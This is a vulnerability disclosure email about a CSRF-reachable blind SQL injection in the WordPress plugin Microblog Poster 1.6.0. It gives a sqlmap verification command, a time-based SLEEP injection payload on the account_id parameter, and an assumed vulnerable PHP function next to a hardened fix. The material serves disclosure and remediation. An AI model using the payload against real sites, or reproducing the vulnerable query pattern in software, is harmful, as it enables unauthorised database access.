Subject: Blind SQL injection in Microblog Poster 1.6.0
Date: Wed, 22 Jul 2015 13:17:40 +0200

Hello,

Plugin: Microblog Poster 1.6.0 https://wordpress.org/plugins/microblog-poster/

The injectable query is reachable only by an authenticated administrator, but the settings form has no nonce or other CSRF protection, so an attacker who gets a logged-in administrator to load a page that submits the POST below can execute arbitrary SQL through the plugin without credentials of their own.

1. SQL injection (microblogposter_settings_output())

Method: POST
URL: http://localhost/wp-admin/options-general.php?page=microblogposter.php
Vulnerable parameter: account_id

Example PHP callstack:
microblogposter_settings_output   [/microblog-poster/microblogposter_options.php:543]
wpdb::get_results

Verification:

sqlmap --cookie "..." --dbms mysql --data "update_account_hidden=1&account_id=1" -u "http://localhost/wp-admin/options-general.php?page=microblogposter.php" -p account_id

...
Parameter: account_id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: update_account_hidden=1&account_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))hUuS)
...
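For illustration, here is the code shape that produces the finding above next to a hardened version. This is an added example, not code from Microblog Poster: the vulnerable function is assumed from the advisory (account_id reaches wpdb::get_results without preparation), and the table name and nonce action/field names are placeholders. The WordPress functions used (wpdb::prepare, check_admin_referer, wp_nonce_field, absint, current_user_can) are real.

```php
<?php
// Added example, not the plugin's own code. The table name
// and nonce names below are assumptions for illustration.

// BEFORE (assumed vulnerable shape): the POST field is interpolated
// straight into the SQL text. A value such as
//   1 AND (SELECT * FROM (SELECT(SLEEP(5)))hUuS)
// becomes part of the query, which is what the sqlmap output reports.
function mbp_vulnerable_lookup( $wpdb ) {
    $account_id = $_POST['account_id'];
    $sql = "SELECT * FROM {$wpdb->prefix}mbp_accounts WHERE account_id = $account_id";
    return $wpdb->get_results( $sql );
}

// Settings form: emit a nonce so a forged cross-site POST cannot pass
// the check in mbp_hardened_lookup(). Goes inside the <form> output.
function mbp_settings_form_fields() {
    wp_nonce_field( 'mbp_update_account', 'mbp_nonce' );
}

// AFTER: CSRF check, capability check, integer coercion and a prepared
// statement. check_admin_referer() dies unless the request carries a
// valid nonce for this action and user; %d forces an integer, so the
// SQL text no longer depends on user-controlled data at all.
function mbp_hardened_lookup( $wpdb ) {
    check_admin_referer( 'mbp_update_account', 'mbp_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    $account_id = isset( $_POST['account_id'] ) ? absint( $_POST['account_id'] ) : 0;
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}mbp_accounts WHERE account_id = %d",
        $account_id
    );
    return $wpdb->get_results( $sql );
}
```

With the hardened version, the sqlmap run shown above gets a 403-style nonce failure from check_admin_referer() before any query runs, and even a replayed valid nonce only ever yields WHERE account_id = <integer>.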


--
Regards,
Marcin Probola